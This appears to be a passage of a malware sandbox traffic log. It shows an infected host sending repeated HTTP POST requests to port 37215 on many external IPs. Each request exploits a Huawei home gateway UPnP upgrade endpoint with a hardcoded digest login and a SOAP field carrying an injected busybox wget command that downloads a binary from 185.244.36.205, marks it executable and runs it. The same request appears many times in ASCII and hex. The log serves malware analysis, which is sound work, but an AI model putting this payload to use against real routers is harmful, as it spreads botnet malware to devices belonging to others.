                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              334192.168.2.154193245.236.206.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208203077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              335192.168.2.155385241.86.4.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208224058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              336192.168.2.155167894.134.156.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208225012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              337192.168.2.1554578121.132.159.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208259106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              338192.168.2.1535420157.199.220.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208302975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              339192.168.2.1542520121.122.206.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208921909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              340192.168.2.154063231.26.228.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209012985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              341192.168.2.154207237.203.116.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209018946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              342192.168.2.156047831.222.152.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209018946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              343192.168.2.1543168186.29.140.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209049940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              344192.168.2.154656831.12.41.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209762096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
